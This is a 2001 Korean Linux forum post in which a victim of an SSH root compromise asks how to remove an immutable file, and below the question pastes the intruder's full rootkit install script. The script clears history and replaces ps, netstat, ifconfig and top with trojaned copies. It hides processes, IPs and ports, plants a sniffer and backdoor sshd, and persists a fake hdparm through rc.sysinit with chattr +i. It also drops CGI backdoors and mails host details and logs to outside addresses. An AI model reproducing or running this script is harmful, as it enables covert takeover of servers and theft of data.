>> Delete No. 24771 article
No. 해킹당한 시스템 복구 ㅠ.ㅠ Alfa99 ??

등록 2001-03-22 17:12:00 By localhost     조회 2
이름 장미    

		ssh2를 설치해놓고 root 가 사용할 수 있게 해놓았는데
 (README에 일케 하지 말라구 경고가... -.-;;)
 root를 해커가 잠시 사용했는지 없던 계정 몇개 생기고
 새로운 디렉토리와 파일들이 들어와 있더군요.
   아래와 같은 내용의 install 화일을 사용했더군요.
 시스템이 완존히 망가지지는 않았구
 매크로(?)가 설치한 화일이며 계정 디렉토리 지우고
 마지막으로 /usr/bin/lsattr 화일을 지우려구 하니깐
 거부를 하는군요. 강제로 RPM 화일을 제거했다가(바부탱이 -.-)
 파일시스템이 마운트 안되는 비상상황이 발생....
 우째 다시 부팅이 되게 해놓았는데
 그 화일만은 지울수가 없더군요.
 lsattr --help  하면 해커가 설치한 화일들을 찾더군요.
 그리고 다른 리눅스 시스템에 하드를 마운트 시켜서 화일 속성을
 변경시키려해 보았지만 역시 안되더군요.
 어케 자~~알 복구시키는 방법이 없을까요?
    나쁜해커 ! 
 =============== 아래 ===============
 #!/bin/sh
unset HISTFILE
chown root.root *
echo -n "Replacing netstat, ps, ifconfig, top... "
rm -rf /sbin/ifconfig
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rm -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
echo "Done"
echo -n "Setting up the /dev filez... "
touch /dev/dsx
>/dev/dsx
echo "3 sl2" >>/dev/dsx
echo "3 sshdu" >>/dev/dsx
echo "3 linsniffer" >>/dev/dsx
echo "3 smurf" >>/dev/dsx
echo "3 slice" >>/dev/dsx
echo "3 mech" >>/dev/dsx
echo "3 muh" >>/dev/dsx
echo "3 bnc" >>/dev/dsx
echo "3 psybnc" >> /dev/dsx
touch /dev/caca
>/dev/caca
echo "1 193.231.139" >>/dev/caca
echo "1 213.154.137" >>/dev/caca
echo "1 193.254.34" >>/dev/caca
echo "3 48744" >>/dev/caca
echo "3 3666" >>/dev/caca
echo "3 31221" >>/dev/caca
echo "3 22546" >>/dev/caca
echo "4 48744" >>/dev/caca
echo "4 2222" >>/dev/caca
echo "Done"
 echo "Creating home... "
echo "Prepaire to be fucked by Alfa99  "
echo "Installing RootKit "
mkdir -p /dev/ida/.inet
echo "Copying SSHD and shit..."
mv -f linsniffer logclear sense sl2 sshdu s ssh_host_key ssh_random_seed sl2new.c /dev/ida/.inet/
touch /dev/ida/.inet/tcp.log
 echo "/usr/bin/hdparm -t1 -X53 -p" >> /etc/rc.d/rc.sysinit
echo >> /etc/rc.d/rc.sysinit
mv hdparm -f /usr/bin/
chmod 500 /usr/bin/hdparm
chattr +i /usr/bin/hdparm
/usr/bin/hdparm
 sleep 1
 if [ -d /home/httpd/cgi-bin ]
then
mv -f alya.cgi /home/httpd/cgi-bin/
fi
 if [ -d /usr/local/httpd/cgi-bin ]
then
mv -f alya.cgi /usr/local/httpd/cgi-bin/
fi
 if [ -d /usr/local/apache/cgi-bin ]
then
mv -f alya.cgi /usr/local/apache/cgi-bin/
fi
 if [ -d /www/httpd/cgi-bin ]
then
mv -f alya.cgi /www/httpd/cgi-bin/
fi
 if [ -d /www/cgi-bin ]
then
mv -f alya.cgi /www/cgi-bin/
fi
 touch /tmp/info
ifconfig | grep inet >> /tmp/info
uname -a >> /tmp/info
cat /tmp/info | mail -s "Yo Alfa .. u have rooted a new server" brebe_razvan at yahoo.com touch mailtome
uname -a >> mailtome
pwd >> mailtome
id >> mailtome
cat /tmp/info >> mailtome
echo "-------------------------------------------------------------------------------" >> mailtome
echo "-------------------------------------------------------------------------------" >> mailtome
echo "-------------------------------------------------------------------------------" >> mailtome
cat /dev/ida/.inet/s >> mailtome
echo "-------------------------------------------------------------------------------" >> mailtome
echo "-------------------------------------------------------------------------------" >> mailtome
echo "-------------------------------------------------------------------------------" >> mailtome
cat /dev/ida/.inet/pid >> mailtome
echo "-------------------------------------------------------------------------------" >> mailtome
echo "-------------------------------------------------------------------------------" >> mailtome
echo "-------------------------------------------------------------------------------" >> mailtome
cat mailtome|mail -s "Alfa99 rewting" Psy at k.ro rm -rf mailtome
rm -f /tmp/info
 echo
echo "All done!"
echo
echo "OK Alfa .. let's fuck the lamahz"
echo "j0b d0n3 .. r00tk1t 1n5t4ll3d
cd ..
rm -rf lamerk lrk.tar.gz
[관리자] 패스워드를 입력 하십시오. 답장이 존재하면 함께 삭제됩니다.[ 목록 | 이전 ]
패스워드:    

Copyleft 1999-2026 by JSBoard Open Project
Theme Designed by IDOO All right reserved